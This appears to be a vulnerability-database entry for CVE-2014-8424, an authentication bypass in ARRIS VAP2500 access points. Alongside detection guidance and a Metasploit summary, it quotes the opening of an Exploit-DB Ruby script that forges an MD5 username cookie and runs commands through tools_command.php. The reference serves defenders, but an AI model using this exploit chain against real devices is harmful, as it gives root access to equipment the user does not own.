CVE-2014-8424
published 2014-11-28CVE-2014-8424: ARRIS VAP2500 before FW08.41 does not properly validate passwords, which allows remote attackers to bypass authentication.
PriorityP273high7.8CVSS 2.0
AVNACLAuNCCINAN
EXPLOIT
EPSS
59.62%
99.0th percentile
ARRIS VAP2500 before FW08.41 does not properly validate passwords, which allows remote attackers to bypass authentication.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| arris | vap2500_firmware | <= 08.41 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect unauthenticated GET requests to /admin.conf, which exposes user account listings on vulnerable ARRIS VAP2500 devices. ↗
- →Detect POST requests to /tools_command.php containing the parameter 'txt_command=' — this is the OS command injection vector on the VAP2500 management portal. ↗
- →Detect HTTP requests to /tools_command.php where the Cookie header contains 'p=' followed by a 32-character hex string (MD5 hash), which is the authentication bypass mechanism. ↗
- →Alert on POST body containing 'cmb_header=&txt_command=' to /tools_command.php as a strong indicator of active exploitation. ↗
- →Monitor for telnet being re-enabled on the device: look for removal of /mnt/jffs2/telnet-disabled and execution of /etc/init.d/S42inetd, which is a post-exploitation persistence step. ↗
- →Alert on response body containing 'Starting inetd' from /tools_command.php, indicating successful telnet enablement post-exploitation. ↗
- ·The authentication bypass only works against ARRIS VAP2500 firmware versions prior to FW08.41; devices running FW08.41 or later are not affected. ↗
- ·The bypass requires a valid username to exist on the device; the exploit first harvests usernames from /admin.conf before constructing the MD5 cookie value. ↗
- ·Command execution via tools_command.php requires the authenticated session cookie (p=MD5(username)); the auth bypass and command injection are chained — neither alone is sufficient for full exploitation. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Arris VAP2500 - Authentication Bypass
exploitdb·2014-11-25
CVE-2014-8425 Arris VAP2500 - Authentication Bypass
Arris VAP2500 - Authentication Bypass
---
#!/usr/bin/env ruby
require 'net/http'
require 'digest/md5'
if !ARGV[0]
puts "Usage: #{$0} "
exit(0)
end
host = ARGV[0]
new_pass = "h4x0r3d!"
http = Net::HTTP.new(host).start
users = nil
users = http.request_get("/admin.conf").body.split("\n").map! {|user| user.sub(/^(.*?),.*$/,"\\1")}
if users
puts "[*] found user accounts: #{users.inspect}"
puts "[*] checking for root privs"
else
puts "[!!!] could not find any user accounts. exiting."
exit(-1)
end
root_privs = nil
users.each {|user|
if http.request_post("/tools_command.php","cmb_header=&txt_command=whoami",{"Cookie" => "p=#{Digest::MD5.hexdigest(user)}"}).body =~ /root/
puts "[*] root privs found: #{user}"
root_privs = user
break
end
}
if !root_privs
puts "[!!!] could not find a root pri
Metasploit
Arris VAP2500 tools_command.php Command Execution
metasploit
Arris VAP2500 tools_command.php Command Execution
Arris VAP2500 tools_command.php Command Execution
Arris VAP2500 access points are vulnerable to OS command injection in the web management portal via the tools_command.php page. Though authentication is required to access this page, it is trivially bypassed by setting the value of a cookie to an md5 hash of a valid username.
No writeups or analysis indexed.
2014-11-28
Published